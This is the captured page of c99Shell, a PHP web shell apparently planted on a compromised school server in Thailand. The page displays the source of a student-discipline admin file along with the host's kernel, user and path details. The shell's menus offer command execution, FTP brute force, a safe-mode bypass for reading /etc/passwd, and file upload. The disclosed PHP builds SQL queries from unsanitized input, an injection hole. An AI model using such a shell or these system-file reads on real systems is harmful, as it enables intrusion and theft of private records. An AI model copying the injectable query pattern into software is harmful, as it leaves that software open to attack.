!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/Std_Acc_depart/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     EditPunishList.php (8.99 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start
();
 if (
session_is_registered("valid_user")&&session_is_registered("Priority")&&session_is_registered("password") )
 {
include(
"../include/FunctionDB.php");
include(
"admin_menu.php");
include(
"../include/Function.php");
ConnectDB();
$sql "Select * From student_tb Where Student_id='$Student_id'";
$result1 mysql_query($sql) or die("Error ".mysql_error()); 
$rs mysql_fetch_array($result1);
$strSQL "Select * From std_punish_tb Where Student_id='$Student_id'";
if (! 
$Page)
$Page 1;
$Pre_Page $Page 1;
$Next_Page $Page +1;
$Per_Page =10;
$result mysql_query($strSQL);

$Page_start = ($Per_Page*$Page) - $Per_Page;
$Num_Rows mysql_num_rows($result);

if( 
$Num_Rows <= $Per_Page)
   
$Num_Pages 1;
else if ((
$Num_Rows $Per_Page) == 0)
       
$Num_Pages = ($Num_Rows $Per_Page);
else
        
$Num_Pages = ($Num_Rows $Per_Page) + 1;
$Num_Pages = (int)$Num_Pages;

if (( 
$Page $Num_Pages) || ($Page 0))
  echo
"Page $Page More than $Num_Pages";
$strSQL .=" LIMIT $Page_start,$Per_Page" ;
$result mysql_query($strSQL); 
///////////////////////////////////////////////////////////////////////////////////
$num mysql_num_rows$result );
//$count = 0;
?>
<table width="835" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="835" ><br> 
          <fieldset>
            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Edu_Menu.php">˹éÒËÅÑ¡</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="StudentList.php?Student_id=<? echo $rs[Student_id]?>">¢éÍÁÙŹѡÈÖ¡ÉÒ</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="menu_std.php?Student_id=<? echo $rs[Student_id]?>">¢éÍÁÙÅ»ÃÐÇѵԹѡÈÖ¡ÉÒ</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="EditStudentList.php"></a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="AddPunish.php?Student_id=<? echo $rs[Student_id]?>"> à¾ÔèÁ¢éÍÁÙŤÇÒÁ¼Ô´áÅÐâ·É</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="EditPunishList.php?Student_id=<? echo $rs[Student_id]?>">á¡é䢢éÍÁÙŤÇÒÁ¼Ô´áÅÐâ·É</a></font></legend>
            <label>
  <form id="form1" name="form1" method="post" action="DelPunish.php">
    <table width="97%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#EEEEEE" >
      <tr bgcolor="#FDDCCE" >
        <td colspan="5"><div align="center"><font color="#003366" size="4" face="Tahoma"><strong><font color="#FF0000">á¡éä¢</font> <font color="#000000">ÃÒ¡ÒÃ</font></strong></font><font size="4" face="Tahoma, MS Sans Serif"><strong>¢éÍÁÙžĵԡÃÃÁ 
          áÅРÇԹѠ¹Ñ¡ÈÖ¡ÉÒ</strong></font></div></td>
      </tr>
      <tr bgcolor="#EEEEEE">
        <td width="32" bgcolor="#EEEEEE" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma"><strong>ź</strong></font></div></td>
        <td width="37" style="border:1px solid gray"><div align="center"><font color="#003366" size="1" face="Tahoma"><strong>No.</strong></font></div></td>
        <td width="113" bgcolor="#EEEEEE" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma"><strong>Çѹ·Õè</strong></font></div></td>
        <td width="734" bgcolor="#EEEEEE" style="border:1px solid gray"><div align="center"><strong><font size="2" face="Tahoma">¾ÄµÔ¡ÃÃÁ·Õè·Ó¼Ô´</font></strong></div></td>
        <td width="81" bgcolor="#EEEEEE" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma"><strong>á¡éä¢</strong></font></div></td>
      </tr>
      <?
$i 
1;
 while(
$row mysql_fetch_array($result))
 {

     if(
$count==0)
     {
?>
      <tr bordercolor="#EEEEEE" bgcolor="#FFFFFF" >
        <td bgcolor="#F7F7F7" ><div align="center">
            <input type="checkbox" name="checkbox[]" value="<? echo $row[code]?>" />
        </div></td>
        <td bgcolor="#F7F7F7" ><div align="center"><font color="#000000" size="2" face="Tahoma">
            <? 
     
//(50*(currentpage-1))+i 
        
$no = ($Per_Page * ( $Page -1))+$i ;
        echo 
$no;
        
?>
        </font></div></td>
        <td bgcolor="#F7F7F7" ><div align="center"><font color="#003366" size="2" face="Tahoma">
            <?php 
       $sday 
$row[Date_note];
    
$yearthai explode("-",$sday);
    
$day =      intval($yearthai[2]);
    
$month =  intval($yearthai[1]);
    
$year =     intval($yearthai[0]);     
          
//////////////////
   
$year =  getYear($year);
  
$m getThaiSubMonth($month);
     echo
"$day"." "."$m"." "."$year";
    
?>
        </font></div></td>
        <td bgcolor="#F7F7F7" ><div align="left"><font color="#006633" size="2" face="Tahoma"> <? echo nl2br($row["Perform"])?> </font></div>
            <div align="left"><font color="#990099" size="2" face="Tahoma"> <a href="../Student/menu_std.php?Student_id=<?=$row["Student_id"]?>" title="Click to see Detail"  class="d"> </a> </font> </div></td>
        <td bgcolor="#F7F7F7" ><div align="center"><font color="#990099" size="2" face="Tahoma"><strong><a href="FrmEditPunish.php?code=<? echo $row[code]?>&amp;&amp;Student_id=<? echo $rs[Student_id]?>" class="c">á¡éä¢</a></strong></font> </div></td>
      </tr>
      <?
    $count
=1;
     }
else
{
?>
      <tr bordercolor="#EEEEEE" bgcolor="#FFFFFF">
        <td ><div align="center">
            <input type="checkbox" name="checkbox[]2" value="<? echo $row[code]?>" />
        </div></td>
        <td ><div align="center"><font color="#000000" size="2" face="Tahoma">
            <? 
     
//(50*(currentpage-1))+i 
        
$no = ($Per_Page * ( $Page -1))+$i ;
        echo 
$no;
        
?>
        </font></div></td>
        <td bgcolor="#FFFFFF" ><div align="center"><font color="#003366" size="2" face="Tahoma">
            <?php 
       $sday 
$row[Date_note];
    
$yearthai explode("-",$sday);
    
$day =      intval($yearthai[2]);
    
$month =  intval($yearthai[1]);
    
$year =     intval($yearthai[0]);     
          
//////////////////
   
$year =  getYear($year);
  
$m getThaiSubMonth($month);
     echo
"$day"." "."$m"." "."$year";
    
?>
        </font></div></td>
        <td bgcolor="#FFFFFF" ><div align="left"><font color="#006633" size="2" face="Tahoma"><? echo nl2br($row["Perform"])?></font></div>
            <div align="left"><font color="#990099" size="2" face="Tahoma"> <a href="../Student/menu_std.php?Student_id=<?=$row["Student_id"]?>" title="Click to see Detail"  class="d"> </a> </font></div>
          <div align="left"><font color="#000000" size="2" face="Tahoma"> </font> </div></td>
        <td ><div align="center"><font color="#990099" size="2" face="Tahoma"><a href="../Student/menu_std.php?Student_id=<?=$row["Student_id"]?>" title="Click to see Detail"  class="d"> </a><strong><a href="FrmEditPunish.php?code=<? echo $row[code]?>&amp;&amp;Student_id=<? echo $rs[Student_id]?>" class="c">á¡éä¢</a></strong></font></div></td>
      </tr>
      <?
$count
=0;
}
$i++;
 }    
CloseDB();
?>
      <tr bgcolor="#EEEEEE">
        <td colspan="5"><div align="center">
            <input type="hidden" name="Student_id" value="<? echo $row[Student_id]?>" />
            <input type="submit" name="Submit" value="   Åº   " />
        </div></td>
      </tr>
      <tr bgcolor="#FDDCCE">
        <td height="22" colspan="5"><div align="center"><font color="#003366" size="2" face="Tahoma">·Ñé§ËÁ´</font><font color="#FF0000" size="2" face="Tahoma"> <strong><? echo $num ?> </strong></font><font color="#003366" size="2" face="Tahoma">¤ÃÑé§</font></div></td>
      </tr>
    </table>
    <table width="98%" border="0" cellpadding="0" cellspacing="1" bordercolor="#99CCFF">
      <tr>
        <td align="right" bordercolor="#CCCCCC" class="Tahoma11"><div align="center"><font color="#FFFFFF"> <font color="#FFFFFF" size="3" face="MS Sans Serif"><strong> <font color="#0033CC" size="2" face="Tahoma"><?php echo $Num_Pages;?></font></strong></font><font size="2" face="Tahoma"><strong>&nbsp;</strong><font color="#000000">˹éÒ</font></font> <font color="#0033CC" size="2" face="Tahoma"> <strong>
            <?php
if ($Pre_Page)
   echo
"<a href=\"$PHP_SELF?Page=$Pre_Page\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b>&lt;&lt; Previus</b> </font></a>";

   for(
$i=1;$i<=$Num_Pages;$i++)
   {
    if(
$i != $Page)
         echo
" [<a href=\"$PHP_SELF?Page=$i\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b>$i</b></font></a>] ";
    else
        echo
"<b>$i</b>";
   }
if(
$Page != $Num_Pages)
 echo
"<a href=\"$PHP_SELF?Page=$Next_Page\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b> Next &gt;&gt;</b> </font></a>";
 
?>
        </strong></font> </font> </div></td>
      </tr>
    </table>
    </form>
          </fieldset>
        <br>
        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>ËÁÒÂà˵ؠ:</b> ãªéàÁÒÊì¤ÅÔ¡·Õèª×èÍ<br>
      </font></td>
    </tr>
</table>
<?php 
    
}
else
{
       echo
"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";
       echo
"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.057 ]--